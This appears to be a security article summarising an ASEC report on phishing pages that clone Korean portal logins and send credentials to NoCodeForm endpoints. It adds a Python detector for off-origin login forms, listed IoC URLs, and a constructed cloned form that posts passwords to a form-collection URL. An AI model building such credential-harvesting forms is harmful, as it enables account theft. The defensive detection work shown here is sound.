Researchers discovered phishing attacks that mimic the login pages of various Korean portals, logistics brands, and webmail services. The fraudulent login screens closely resemble the legitimate sites, making them difficult to distinguish at first glance.
The report included side-by-side comparisons: the phishing page (for example, a fake Naver login) on the left and the authentic page on the right. Another example showed the phishing HTML file (named “doc003.shtml”) designed to mimic the Nate login page.
Threat actors build highly deceptive phishing pages by reusing the legitimate source code of real websites and altering it to steal user credentials: the login form’s action and destination address are replaced with attacker-controlled ones.
This technique conceals the phishing attempt because the page appears genuine except for the mechanism that transmits the data. To trick users further, attackers may pre-fill the login form with the recipient’s email address, increasing the likelihood that unsuspecting victims will enter their passwords.
Attackers abused NoCodeForm, a service designed to handle form submissions and deliver the submitted data by email or Slack in HTML format, to steal user credentials.
By creating an account and obtaining a unique form ID, attackers could capture user input from external forms. This essentially turned those forms into data collection tools for the attacker, enabling them to steal sensitive information submitted by unsuspecting users.
In one case, an attacker altered a legitimate website’s login form by modifying the form’s “onsubmit” event handler so that the “action” property is used instead. That action property points to a NoCodeForm endpoint with a specific form ID, which serves as the destination for the stolen credentials.
Tests confirmed that credentials entered by the user are captured either through NoCodeForm’s default collection or through a delivery method designated by the attacker, such as email or Slack.
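A defensive check for the pattern described above: scan an HTML page for forms that contain a password field and whose action points off-origin (or to a known form-collection service), and report any pre-filled username value. This is an added example, not code from the ASEC report; the sample HTML and its form ID are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Form-collection services seen in this campaign (from the report's IoCs).
FORM_COLLECTORS = {"nocodeform.io"}


class LoginFormAuditor(HTMLParser):
    """Collects every <form>, noting password fields and pre-filled text inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []          # one dict per <form>: action, has_password, prefilled
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False, "prefilled": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            kind = (a.get("type") or "text").lower()
            if kind == "password":
                self._current["has_password"] = True
            elif kind in ("text", "email") and a.get("value"):
                self._current["prefilled"].append(a["value"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_login_forms(html, page_origin):
    """Return findings for login forms whose action leaves the page's own origin."""
    parser = LoginFormAuditor()
    parser.feed(html)
    expected_host = urlparse(page_origin).hostname
    findings = []
    for form in parser.forms:
        if not form["has_password"]:
            continue
        host = urlparse(form["action"]).hostname
        if host is None or host == expected_host:   # relative or same-origin action is fine
            continue
        reason = "known form-collection service" if host in FORM_COLLECTORS else "off-origin action"
        findings.append({"action_host": host, "reason": reason, "prefilled": form["prefilled"]})
    return findings


# Constructed sample: a cloned login form whose action was rewritten to a
# form-collection endpoint (PLACEHOLDER_FORM_ID stands in for a real form ID).
SAMPLE_HTML = """<form id="login" action="https://nocodeform.io/f/PLACEHOLDER_FORM_ID" method="post">
  <input type="text" name="id" value="victim@example.com">
  <input type="password" name="pw">
  <button type="submit">Login</button>
</form>"""
```

Running `audit_login_forms(SAMPLE_HTML, "https://nid.naver.com")` flags the form as posting to a known form-collection service with the victim's address pre-filled.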
ASEC warns users not to log in via attachments in emails from unknown senders: phishing attacks are frequently disguised as legitimate websites, and the high quality of the replicas can make it difficult to tell real from fake.
Users should avoid logging in altogether unless they reached the website through a trusted channel, and if a login was attempted on a phishing page, they should immediately change all relevant passwords.
Two phishing email variants (Phishing/HTML.FakeLogin.SC199025 and Phishing/HTML.FakeLogin.SC199026) were detected on April 12th, 2024; they likely contained malicious links that directed users to fake login pages designed to steal their credentials.
The Indicators of Compromise (IoCs) associated with these emails are two URLs: hxxps://nocodeform[.]io/f/6612aaccf9a3a01ba8f6d979 and hxxps://nocodeform[.]io/f/6605717e7bf0d35064f45348. By blocking these IoCs, security professionals can identify and stop future phishing attempts that reuse the same infrastructure.